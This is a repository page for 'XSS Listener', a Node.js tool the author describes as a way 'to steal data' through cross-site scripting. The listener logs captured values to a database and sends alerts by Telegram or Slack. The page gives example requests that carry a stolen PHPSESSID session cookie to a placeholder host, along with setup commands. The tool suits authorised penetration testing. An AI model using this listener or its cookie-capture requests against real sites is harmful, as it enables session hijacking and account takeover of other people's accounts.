by cagataycali

cagataycali / xss-listener

🕷️ XSS Listener is a penetration tool for easy to steal data with various XSS.

411 Stars 28 Forks Last release: Not found MIT License 31 Commits 0 Releases

Available items

No Items, yet!

The developer of this repository has not created any items for sale yet. Need a bug fixed? Help with integration? A different license? Create a request here:


🕷️ XSS Listener is a penetration tool for easy to steal data with various XSS.

From now on, you do not need XSS listeners! XSS listener records the data you have stolen on the remote site in the database, and gives instant notification with telegram / slack.


🕸️ Know-How Background

🕸️ Listener Usage

Listener accepts all HTTP methods with parameters, then save database. Example:

GET https://yourapp.com/?cookie=PHPSESSID=889c6594db2541db1666cefca7537373


POST https://yourapp.com/ Form: { cookie:'PHPSESSID=889c6594db2541db1666cefca7537373' }

You will notify by telegram bot.


🕸️ Detailed Usage

🕸️ List previous requests


🕸️ Delete previous request by id


🕸️ Even you can use telegram (and / or Slack!)


/delete [id]

🕸️ Run local environment

In terminal,

git clone https://github.com/cagataycali/xss-listener.git; # Clone
cd xss-listener; # Change directory.
npm install; # Install dependencies.
cp .env.example .env
# Fill in .env with required values.
# Fill bot token and user id.
node index.js


MIT © Çağatay Çalı

We use cookies. If you continue to browse the site, you agree to the use of cookies. For more information on our use of cookies please see our Privacy Policy.